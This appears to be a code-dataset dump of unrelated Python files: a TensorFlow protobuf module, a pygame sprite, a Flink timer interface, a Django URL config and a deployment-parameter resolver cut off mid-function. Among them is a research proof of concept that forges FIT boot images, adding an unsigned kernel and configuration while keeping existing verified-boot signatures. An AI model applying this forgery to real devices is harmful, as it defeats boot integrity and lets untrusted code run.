message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=50,
serialized_end=192,
)
_DEBUGOPTIONS = _descriptor.Descriptor(
name='DebugOptions',
full_name='tensorflow.DebugOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='debug_tensor_watch_opts', full_name='tensorflow.DebugOptions.debug_tensor_watch_opts', index=0,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='global_step', full_name='tensorflow.DebugOptions.global_step', index=1,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reset_disk_byte_usage', full_name='tensorflow.DebugOptions.reset_disk_byte_usage', index=2,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=195,
serialized_end=324,
)
_DEBUGGEDSOURCEFILE = _descriptor.Descriptor(
name='DebuggedSourceFile',
full_name='tensorflow.DebuggedSourceFile',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='host', full_name='tensorflow.DebuggedSourceFile.host', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='file_path', full_name='tensorflow.DebuggedSourceFile.file_path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='last_modified', full_name='tensorflow.DebuggedSourceFile.last_modified', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bytes', full_name='tensorflow.DebuggedSourceFile.bytes', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='lines', full_name='tensorflow.DebuggedSourceFile.lines', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=326,
serialized_end=432,
)
_DEBUGGEDSOURCEFILES = _descriptor.Descriptor(
name='DebuggedSourceFiles',
full_name='tensorflow.DebuggedSourceFiles',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source_files', full_name='tensorflow.DebuggedSourceFiles.source_files', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=434,
serialized_end=509,
)
_DEBUGOPTIONS.fields_by_name['debug_tensor_watch_opts'].message_type = _DEBUGTENSORWATCH
_DEBUGGEDSOURCEFILES.fields_by_name['source_files'].message_type = _DEBUGGEDSOURCEFILE
DESCRIPTOR.message_types_by_name['DebugTensorWatch'] = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugOptions'] = _DEBUGOPTIONS
DESCRIPTOR.message_types_by_name['DebuggedSourceFile'] = _DEBUGGEDSOURCEFILE
DESCRIPTOR.message_types_by_name['DebuggedSourceFiles'] = _DEBUGGEDSOURCEFILES
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DebugTensorWatch = _reflection.GeneratedProtocolMessageType('DebugTensorWatch', (_message.Message,), {
'DESCRIPTOR' : _DEBUGTENSORWATCH,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugTensorWatch)
})
_sym_db.RegisterMessage(DebugTensorWatch)
DebugOptions = _reflection.GeneratedProtocolMessageType('DebugOptions', (_message.Message,), {
'DESCRIPTOR' : _DEBUGOPTIONS,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugOptions)
})
_sym_db.RegisterMessage(DebugOptions)
DebuggedSourceFile = _reflection.GeneratedProtocolMessageType('DebuggedSourceFile', (_message.Message,), {
'DESCRIPTOR' : _DEBUGGEDSOURCEFILE,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebuggedSourceFile)
})
_sym_db.RegisterMessage(DebuggedSourceFile)
DebuggedSourceFiles = _reflection.GeneratedProtocolMessageType('DebuggedSourceFiles', (_message.Message,), {
'DESCRIPTOR' : _DEBUGGEDSOURCEFILES,
'__module__' : 'stfsclient.tensorflow.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebuggedSourceFiles)
})
_sym_db.RegisterMessage(DebuggedSourceFiles)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b4110546a7e3cbb0b29bc933b82bc9d946af9b60 | import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""表示单个外星人的类"""
def __init__(self, ai_settings, screen):
"""初始化外星人并设置其起始位置"""
super(Alien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
        # Load the alien image and set its rect attribute
self.image = pygame.image.load('images/alien.bmp')
self.rect = self.image.get_rect()
        # Each alien initially appears near the top-left corner of the screen
self.rect.x = self.rect.width
self.rect.y = self.rect.height
        # Store the alien's exact position
self.x = float(self.rect.x)
def blitme(self):
"""在指定位置绘制外星人"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
"""如果外星人位于屏幕边缘,就返回True"""
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
"""向左或向右移动外星人"""
self.x += (self.ai_settings.alien_speed_factor *
self.ai_settings.fleet_direction)
self.rect.x = self.x |
py | b41105bd0e3226ed013a6d80e480b0e8b10e2620 | #!/usr/bin/python3
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com
#
# pylint: disable=E1101,W0201,C0103
"""
Verified boot image forgery tools and utilities
This module provides services to both take apart and regenerate FIT images
in a way that preserves all existing verified boot signatures, unless you
manipulate nodes in the process.
"""
import struct
import binascii
from io import BytesIO
#
# struct parsing helpers
#
class BetterStructMeta(type):
"""
Preprocesses field definitions and creates a struct.Struct instance from them
"""
def __new__(cls, clsname, superclasses, attributedict):
if clsname != 'BetterStruct':
fields = attributedict['__fields__']
field_types = [_[0] for _ in fields]
field_names = [_[1] for _ in fields if _[1] is not None]
attributedict['__names__'] = field_names
s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types))
attributedict['__struct__'] = s
attributedict['size'] = s.size
return type.__new__(cls, clsname, superclasses, attributedict)
class BetterStruct(metaclass=BetterStructMeta):
"""
Base class for better structures
"""
def __init__(self):
for t, n in self.__fields__:
if 's' in t:
setattr(self, n, '')
elif t in ('Q', 'I', 'H', 'B'):
setattr(self, n, 0)
@classmethod
def unpack_from(cls, buffer, offset=0):
"""
Unpack structure instance from a buffer
"""
fields = cls.__struct__.unpack_from(buffer, offset)
instance = cls()
for n, v in zip(cls.__names__, fields):
setattr(instance, n, v)
return instance
def pack(self):
"""
Pack structure instance into bytes
"""
return self.__struct__.pack(*[getattr(self, n) for n in self.__names__])
def __str__(self):
items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None]
return '(' + ', '.join(items) + ')'
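# Illustrative sketch (not part of the original module): how a fixed-size
# record could be declared with BetterStruct. The class and field names below
# are made up for demonstration; uncomment to try it out.
#
#   class ExampleRecord(BetterStruct):
#       __endian__ = '>'
#       __fields__ = [
#           ('I', 'magic'),
#           ('I', 'length'),
#       ]
#
#   rec = ExampleRecord.unpack_from(b'\x12\x34\x56\x78\x00\x00\x00\x08')
#   assert ExampleRecord.size == 8 and rec.length == 8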
#
# some defs for flat DT data
#
class HeaderV17(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'magic'),
('I', 'totalsize'),
('I', 'off_dt_struct'),
('I', 'off_dt_strings'),
('I', 'off_mem_rsvmap'),
('I', 'version'),
('I', 'last_comp_version'),
('I', 'boot_cpuid_phys'),
('I', 'size_dt_strings'),
('I', 'size_dt_struct'),
]
class RRHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('Q', 'address'),
('Q', 'size'),
]
class PropHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'value_size'),
('I', 'name_offset'),
]
# magical constants for DTB format
OF_DT_HEADER = 0xd00dfeed
OF_DT_BEGIN_NODE = 1
OF_DT_END_NODE = 2
OF_DT_PROP = 3
OF_DT_END = 9
class StringsBlock:
"""
Represents a parsed device tree string block
"""
def __init__(self, values=None):
if values is None:
self.values = []
else:
self.values = values
def __getitem__(self, at):
if isinstance(at, str):
offset = 0
for value in self.values:
if value == at:
break
offset += len(value) + 1
else:
self.values.append(at)
return offset
if isinstance(at, int):
offset = 0
for value in self.values:
if offset == at:
return value
offset += len(value) + 1
raise IndexError('no string found corresponding to the given offset')
raise TypeError('only strings and integers are accepted')
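# Illustrative sketch (not part of the original module): the dual indexing of
# StringsBlock. Indexing with a string returns its byte offset (appending the
# string if missing); indexing with an int returns the string stored at that
# offset. Plain str values are used here for illustration; within this module
# parse_strings() fills the block with bytes. Uncomment to try it out.
#
#   sb = StringsBlock(['data', 'timestamp'])
#   assert sb['data'] == 0         # offset of the first entry
#   assert sb['timestamp'] == 5    # 4 bytes of 'data' plus its NUL terminator
#   assert sb[5] == 'timestamp'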
class Prop:
"""
Represents a parsed device tree property
"""
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def clone(self):
return Prop(self.name, self.value)
def __repr__(self):
return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value))
class Node:
"""
Represents a parsed device tree node
"""
def __init__(self, name=None):
self.name = name
self.props = []
self.children = []
def clone(self):
o = Node(self.name)
o.props = [x.clone() for x in self.props]
o.children = [x.clone() for x in self.children]
return o
def __getitem__(self, index):
return self.children[index]
def __repr__(self):
return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children))
#
# flat DT to memory
#
def parse_strings(strings):
"""
Converts the bytes into a StringsBlock instance so it is convenient to work with
"""
strings = strings.split(b'\x00')
return StringsBlock(strings)
def parse_struct(stream):
"""
Parses DTB structure(s) into a Node or Prop instance
"""
tag = bytearray(stream.read(4))[3]
if tag == OF_DT_BEGIN_NODE:
name = b''
while b'\x00' not in name:
name += stream.read(4)
name = name.rstrip(b'\x00')
node = Node(name)
item = parse_struct(stream)
while item is not None:
if isinstance(item, Node):
node.children.append(item)
elif isinstance(item, Prop):
node.props.append(item)
item = parse_struct(stream)
return node
if tag == OF_DT_PROP:
h = PropHeader.unpack_from(stream.read(PropHeader.size))
length = (h.value_size + 3) & (~3)
value = stream.read(length)[:h.value_size]
prop = Prop(h.name_offset, value)
return prop
if tag in (OF_DT_END_NODE, OF_DT_END):
return None
raise ValueError('unexpected tag value')
def read_fdt(fp):
"""
Reads and parses the flattened device tree (or derivatives like FIT)
"""
header = HeaderV17.unpack_from(fp.read(HeaderV17.size))
if header.magic != OF_DT_HEADER:
raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER))
# TODO: read/parse reserved regions
fp.seek(header.off_dt_struct)
structs = fp.read(header.size_dt_struct)
fp.seek(header.off_dt_strings)
strings = fp.read(header.size_dt_strings)
strblock = parse_strings(strings)
root = parse_struct(BytesIO(structs))
return root, strblock
#
# memory to flat DT
#
def compose_structs_r(item):
"""
Recursive part of composing Nodes and Props into a bytearray
"""
t = bytearray()
if isinstance(item, Node):
t.extend(struct.pack('>I', OF_DT_BEGIN_NODE))
if isinstance(item.name, str):
item.name = bytes(item.name, 'utf-8')
name = item.name + b'\x00'
if len(name) & 3:
name += b'\x00' * (4 - (len(name) & 3))
t.extend(name)
for p in item.props:
t.extend(compose_structs_r(p))
for c in item.children:
t.extend(compose_structs_r(c))
t.extend(struct.pack('>I', OF_DT_END_NODE))
elif isinstance(item, Prop):
t.extend(struct.pack('>I', OF_DT_PROP))
value = item.value
h = PropHeader()
h.name_offset = item.name
if value:
h.value_size = len(value)
t.extend(h.pack())
if len(value) & 3:
value += b'\x00' * (4 - (len(value) & 3))
t.extend(value)
else:
h.value_size = 0
t.extend(h.pack())
return t
def compose_structs(root):
"""
Composes the parsed Nodes into a flat bytearray instance
"""
t = compose_structs_r(root)
t.extend(struct.pack('>I', OF_DT_END))
return t
def compose_strings(strblock):
"""
Composes the StringsBlock instance back into a bytearray instance
"""
b = bytearray()
for s in strblock.values:
b.extend(s)
b.append(0)
return bytes(b)
def write_fdt(root, strblock, fp):
"""
Writes out a complete flattened device tree (or FIT)
"""
header = HeaderV17()
header.magic = OF_DT_HEADER
header.version = 17
header.last_comp_version = 16
fp.write(header.pack())
header.off_mem_rsvmap = fp.tell()
fp.write(RRHeader().pack())
structs = compose_structs(root)
header.off_dt_struct = fp.tell()
header.size_dt_struct = len(structs)
fp.write(structs)
strings = compose_strings(strblock)
header.off_dt_strings = fp.tell()
header.size_dt_strings = len(strings)
fp.write(strings)
header.totalsize = fp.tell()
fp.seek(0)
fp.write(header.pack())
#
# pretty printing / converting to DT source
#
def as_bytes(value):
return ' '.join(["%02X" % x for x in value])
def prety_print_value(value):
"""
Formats a property value as appropriate depending on the guessed data type
"""
if not value:
return '""'
    if value[-1] == 0:
        printable = True
        for x in value[:-1]:
            # iterating over bytes yields ints on Python 3
            if x != 0 and (x < 0x20 or x > 0x7F):
                printable = False
                break
        if printable:
            value = value[:-1]
            return ', '.join('"' + x.decode('utf-8') + '"' for x in value.split(b'\x00'))
if len(value) > 0x80:
return '[' + as_bytes(value[:0x80]) + ' ... ]'
return '[' + as_bytes(value) + ']'
def pretty_print_r(node, strblock, indent=0):
"""
Prints out a single node, recursing further for each of its children
"""
spaces = ' ' * indent
print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/')))
for p in node.props:
print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value))))
for c in node.children:
pretty_print_r(c, strblock, indent+1)
print((spaces + '};'))
def pretty_print(node, strblock):
"""
Generates an almost-DTS formatted printout of the parsed device tree
"""
print('/dts-v1/;')
pretty_print_r(node, strblock, 0)
#
# manipulating the DT structure
#
def manipulate(root, strblock):
"""
Maliciously manipulates the structure to create a crafted FIT file
"""
# locate /images/kernel-1 (frankly, it just expects it to be the first one)
kernel_node = root[0][0]
# clone it to save time filling all the properties
fake_kernel = kernel_node.clone()
# rename the node
fake_kernel.name = b'kernel-2'
# get rid of signatures/hashes
fake_kernel.children = []
# NOTE: this simply replaces the first prop... either description or data
# should be good for testing purposes
fake_kernel.props[0].value = b'Super 1337 kernel\x00'
# insert the new kernel node under /images
root[0].children.append(fake_kernel)
# modify the default configuration
root[1].props[0].value = b'conf-2\x00'
# clone the first (only?) configuration
fake_conf = root[1][0].clone()
# rename and change kernel and fdt properties to select the crafted kernel
fake_conf.name = b'conf-2'
fake_conf.props[0].value = b'kernel-2\x00'
fake_conf.props[1].value = b'fdt-1\x00'
# insert the new configuration under /configurations
root[1].children.append(fake_conf)
return root, strblock
def main(argv):
with open(argv[1], 'rb') as fp:
root, strblock = read_fdt(fp)
print("Before:")
pretty_print(root, strblock)
root, strblock = manipulate(root, strblock)
print("After:")
pretty_print(root, strblock)
with open('blah', 'w+b') as fp:
write_fdt(root, strblock, fp)
if __name__ == '__main__':
import sys
main(sys.argv)
# EOF
|
py | b41105d3874e79f724bd3acbd2e6f34464eaf621 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
from abc import ABC, abstractmethod
class TimerService(ABC):
"""
Interface for working with time and timers.
"""
@abstractmethod
def current_processing_time(self):
"""
Returns the current processing time.
"""
pass
@abstractmethod
def current_watermark(self):
"""
Returns the current event-time watermark.
"""
pass
@abstractmethod
def register_processing_time_timer(self, timestamp: int):
"""
Registers a timer to be fired when processing time passes the given time.
Timers can internally be scoped to keys and/or windows. When you set a timer in a keyed
        context, such as in an operation on KeyedStream, then that context will also be active when you
receive the timer notification.
:param timestamp: The processing time of the timer to be registered.
"""
pass
@abstractmethod
def register_event_time_timer(self, timestamp: int):
"""
        Registers a timer to be fired when the event time watermark passes the given time.
Timers can internally be scoped to keys and/or windows. When you set a timer in a keyed
        context, such as in an operation on KeyedStream, then that context will also be active when you
receive the timer notification.
:param timestamp: The event time of the timer to be registered.
"""
pass
def delete_processing_time_timer(self, timestamp: int):
"""
Deletes the processing-time timer with the given trigger time. This method has only an
effect if such a timer was previously registered and did not already expire.
Timers can internally be scoped to keys and/or windows. When you delete a timer, it is
removed from the current keyed context.
:param timestamp: The given trigger time of timer to be deleted.
"""
pass
def delete_event_time_timer(self, timestamp: int):
"""
Deletes the event-time timer with the given trigger time. This method has only an effect if
such a timer was previously registered and did not already expire.
Timers can internally be scoped to keys and/or windows. When you delete a timer, it is
removed from the current keyed context.
:param timestamp: The given trigger time of timer to be deleted.
"""
pass
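# A minimal sketch (not part of the original interface; class and helper names
# are made up) of an in-memory TimerService that a unit test could use,
# assuming only the abstract methods above need concrete implementations.
# Uncomment to try it out.
#
#   import time
#
#   class InMemoryTimerService(TimerService):
#       def __init__(self):
#           self._timers = set()
#
#       def current_processing_time(self):
#           return int(time.time() * 1000)
#
#       def current_watermark(self):
#           return -2 ** 63  # no watermark received yet
#
#       def register_processing_time_timer(self, timestamp: int):
#           self._timers.add(('processing', timestamp))
#
#       def register_event_time_timer(self, timestamp: int):
#           self._timers.add(('event', timestamp))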
|
py | b41105fab6b55248e26d50b4e4842fbadff43f98 | import mysql.connector
from fixture.db import DbFixture
from fixture.orm import ORMFixture
from models.group import Group
db = ORMFixture(host='127.0.0.1', name='addressbook', user='root', password='')
try:
l = db.get_contacts_in_group(Group(id='219'))
for item in l:
print(item)
print(len(l))
finally:
pass #db.destroy() |
py | b41106ac6e6c29c31fc3f3d908cd171ba8fa6dd7 | """certificates URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from accounts import views
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.base,name='base'),
path('records/',include('records.urls')),
path('database/',include('database.urls')),
path('accounts/',include('accounts.urls'))
]
|
py | b41106ddeb62c1b08c01f8d974d8422bbec0f1d7 | #!/usr/bin/env python
# Copyright 2016-2017 Nitor Creations Oy
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import str
from builtins import range
import json
import os
import re
import subprocess
import sys
import yaml
import six
from base64 import b64encode
from collections import OrderedDict
from glob import glob
from yaml import ScalarNode, SequenceNode, MappingNode
from numbers import Number
from operator import itemgetter
from botocore.exceptions import ClientError
from copy import copy
from jmespath import search
from ec2_utils.instance_info import (
resolve_account,
stack_params_and_outputs_and_stack,
dthandler,
)
from n_utils import _to_str
from n_utils.utils import (
expand_vars,
expand_only_double_paranthesis_params,
get_images,
ParamNotAvailable,
)
from n_utils.git_utils import Git
from n_utils.ndt import find_include
from n_utils.ecr_utils import repo_uri
from n_utils.tf_utils import pull_state, flat_state, jmespath_var
from n_vault import Vault
from threadlocal_aws import region
from threadlocal_aws.clients import ssm, ec2, connect
from cloudformation_utils.tools import (
process_script_decorated as import_script,
cloudformation_yaml_loads as yaml_load,
)
stacks = dict()
terraforms = dict()
parameters = dict()
ssm_params = dict()
vault_params = dict()
product_amis = dict()
owner_amis = dict()
CFG_PREFIX = "AWS::CloudFormation::Init_config_files_"
CONNECT_INSTANCE_ID = None
############################################################################
# _THE_ yaml & json deserialize/serialize functions
yaml.SafeDumper.yaml_representers[
None
] = lambda self, data: yaml.representer.SafeRepresenter.represent_str(
self,
_to_str(data),
)
SOURCED_PARAMS = None
def run_command(command):
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
output = proc.communicate()
if proc.returncode:
raise Exception("Failed to run " + str(command))
return output[0]
def _resolve_stackref_from_dict(stack_var):
if "region" in stack_var and "stackName" in stack_var and "paramName" in stack_var:
return _resolve_stackref(
stack_var["region"], stack_var["stackName"], stack_var["paramName"]
)
elif "component" in stack_var and "stack" in stack_var and "paramName" in stack_var:
param_name = stack_var["paramName"]
del stack_var["paramName"]
params = load_parameters(**stack_var)
region = params["REGION"]
stack_name = params["STACK_NAME"]
return _resolve_stackref(region, stack_name, param_name)
else:
return None
def _resolve_stackref(region, stack_name, stack_param):
stack_key = region + "." + stack_name
stack_params = {}
if stack_key in stacks:
stack_params = stacks[stack_key]
else:
stack_params, _ = stack_params_and_outputs_and_stack(
stack_name=stack_name, stack_region=region
)
stacks[stack_key] = stack_params
if stack_param in stack_params:
return stack_params[stack_param]
return None
def _resolve_tfref_from_dict(tfref_var):
if (
"component" in tfref_var
and "terraform" in tfref_var
and ("paramName" in tfref_var or "jmespath" in tfref_var)
):
with Git() as git:
current_branch = git.get_current_branch()
if "branch" in tfref_var:
branch = tfref_var["branch"]
else:
branch = current_branch
tf_key = (tfref_var["component"], tfref_var["terraform"], branch)
if tf_key in terraforms:
terraform = terraforms[tf_key]
else:
root = "."
if branch != current_branch:
root = git.export_branch(branch)
terraform = pull_state(
tfref_var["component"], tfref_var["terraform"], root=root
)
terraforms[tf_key] = terraform
if "paramName" in tfref_var:
flat_state_dict = flat_state(terraform)
if tfref_var["paramName"] in flat_state_dict:
return flat_state_dict[tfref_var["paramName"]]
else:
return None
if "jmespath" in tfref_var:
return jmespath_var(terraform, tfref_var["jmespath"])
else:
return None
def _resolve_ssm_parameter(ssm_key, region=None):
value = None
if ssm_key in ssm_params:
value = ssm_params[ssm_key]
else:
ssm_resp = ssm(region=region).get_parameter(Name=ssm_key, WithDecryption=True)
if "Parameter" in ssm_resp and "Value" in ssm_resp["Parameter"]:
value = ssm_resp["Parameter"]["Value"]
ssm_params[ssm_key] = value
return value
def _resolve_vault_parameter(vault_key):
value = None
if vault_key in vault_params:
value = vault_params[vault_key]
else:
value = Vault().lookup(vault_key)
vault_params[vault_key] = value
return value
def _resolve_product_ami(product_code, region=None):
value = None
if product_code in product_amis:
value = product_amis[product_code]
else:
ami_resp = ec2(region=region).describe_images(
Filters=[{"Name": "product-code", "Values": [product_code]}],
Owners=["aws-marketplace"],
)
ami_ids = [
image["ImageId"]
for image in sorted(
ami_resp["Images"], key=itemgetter("CreationDate"), reverse=True
)
]
if ami_ids:
value = ami_ids[0]
product_amis[product_code] = value
return value
def _resolve_onwer_named_ami(owner, name, region=None):
value = None
if (owner, name) in owner_amis:
return owner_amis[(owner, name)]
else:
ami_resp = ec2(region=region).describe_images(
Owners=[owner], Filters=[{"Name": "name", "Values": [name]}]
)
ami_ids = [
image["ImageId"]
for image in sorted(
ami_resp["Images"], key=itemgetter("CreationDate"), reverse=True
)
]
if ami_ids:
value = ami_ids[0]
owner_amis[(owner, name)] = value
return value
def _resolve_flowref(flowname):
if CONNECT_INSTANCE_ID:
paginator = connect().get_paginator("list_contact_flows")
for page in paginator.paginate(InstanceId=CONNECT_INSTANCE_ID):
for flow in page["ContactFlowSummaryList"]:
if flow["Name"] == flowname:
return flow["Arn"]
return None
def _process_infra_prop_line(line, params, used_params):
key_val = line.split("=", 1)
if len(key_val) == 2:
key = re.sub("[^a-zA-Z0-9_]", "", key_val[0].strip())
if key in os.environ:
value = os.environ[key]
else:
value = key_val[1]
value = _process_value(value, used_params)
params[key] = value
if isinstance(value, six.string_types):
used_params[key] = value
else:
used_params[key] = json_save_small(value)
def _process_value(value, used_params):
if isinstance(value, six.string_types):
if not value.strip():
return ""
value = expand_vars(value, used_params, None, [])
try:
yaml_value = yaml_load(value)
if isinstance(yaml_value, Number):
return value
            if yaml_value is not None:
value = yaml_value
except:
pass
value = expand_vars(value, used_params, None, [])
if isinstance(value, six.string_types):
value = value.strip()
elif isinstance(value, OrderedDict):
region = None
if "REGION" in used_params:
region = used_params["REGION"]
# Don't go into external refs if:
# a) resolving base variables like REGION and paramEnvId
# b) resolving basic variables used in terraform backend configuration
if (
"DO_NOT_RESOLVE_EXTERNAL_REFS" not in os.environ
and "TF_INIT_OUTPUT" not in os.environ
):
if "StackRef" in value:
stack_value = _resolve_stackref_from_dict(value["StackRef"])
if stack_value:
value = stack_value
if "TFRef" in value:
tf_value = _resolve_tfref_from_dict(value["TFRef"])
if tf_value:
value = tf_value
if "Encrypt" in value:
enc_conf = value["Encrypt"]
if isinstance(enc_conf, OrderedDict):
to_encrypt = yaml_save(enc_conf["value"])
else:
to_encrypt = enc_conf["value"]
value = _process_value(to_encrypt, used_params)
del enc_conf["value"]
vault = Vault(**enc_conf)
value = b64encode(vault.direct_encrypt(value))
if "YamlRef" in value:
if "file" in value["YamlRef"] and "jmespath" in value["YamlRef"]:
yaml_file = value["YamlRef"]["file"]
contents = yaml_load(open(yaml_file))
value = search(value["YamlRef"]["jmespath"], contents)
if value:
return _process_value(value, used_params)
if "SsmRef" in value:
ssm_key = value["SsmRef"]
ssm_value = _resolve_ssm_parameter(ssm_key, region=region)
if ssm_value:
value = ssm_value
if "ProductAmi" in value:
product_code = value["ProductAmi"]
product_ami = _resolve_product_ami(product_code, region=region)
if product_ami:
value = product_ami
if "OwnerNamedAmi" in value:
if (
"owner" in value["OwnerNamedAmi"]
and "name" in value["OwnerNamedAmi"]
):
owner = value["OwnerNamedAmi"]["owner"]
name = value["OwnerNamedAmi"]["name"]
owner_ami = _resolve_onwer_named_ami(owner, name, region=region)
if owner_ami:
value = owner_ami
if "FlowRef" in value:
flow_value = _resolve_flowref(value["FlowRef"])
if flow_value:
value = flow_value
return value
def joined_file_lines(filename):
with open(filename, "r") as f:
prevline = ""
        to_yield = None
        for line in f.readlines():
            if prevline.strip().endswith("\\"):
                to_yield = None
                prevline = prevline[:-2] + "\n" + line
            elif line.startswith(" ") or line.startswith("\t"):
                to_yield = None
                prevline = prevline + line
            elif line.startswith("#"):
                to_yield = prevline.strip()
                prevline = ""
            elif prevline:
                to_yield = prevline.strip()
                prevline = line
            else:
                to_yield = None
                prevline = line
            if to_yield:
                yield to_yield
        if prevline:
            yield prevline.strip()
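# Illustrative sketch (not part of the original module), using hypothetical
# keys: a physical line ending in a backslash, or a following line starting
# with whitespace, is merged into the previous logical line before being
# handed to _process_infra_prop_line. For a file with the three lines
# 'FOO=one \', 'two' and 'BAR=baz', joined_file_lines() yields
# "FOO=one \ntwo" (continuation joined with a newline) and then "BAR=baz".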
def import_parameter_file(filename, params):
used_params = OrderedDict(copy(os.environ))
used_params.update(params)
for line in joined_file_lines(filename):
_process_infra_prop_line(line, params, used_params)
def _add_subcomponent_file(component, branch, type, name, files):
if name:
os.environ["ORIG_" + type.upper() + "_NAME"] = name
files.append(
component + os.sep + type + "-" + name + os.sep + "infra.properties"
)
files.append(
component
+ os.sep
+ type
+ "-"
+ name
+ os.sep
+ "infra-"
+ branch
+ ".properties"
)
def resolve_docker_uri(component, uriParam, image_branch, git):
if not git:
git = Git()
with git:
if uriParam in os.environ:
return os.environ[uriParam]
docker = uriParam[14:]
docker_params = load_parameters(
component=component, docker=docker, branch=image_branch, git=git
)
return repo_uri(docker_params["DOCKER_NAME"])
def lreplace(pattern, sub, string):
return sub + string[len(pattern) :] if string.startswith(pattern) else string
def rreplace(pattern, sub, string):
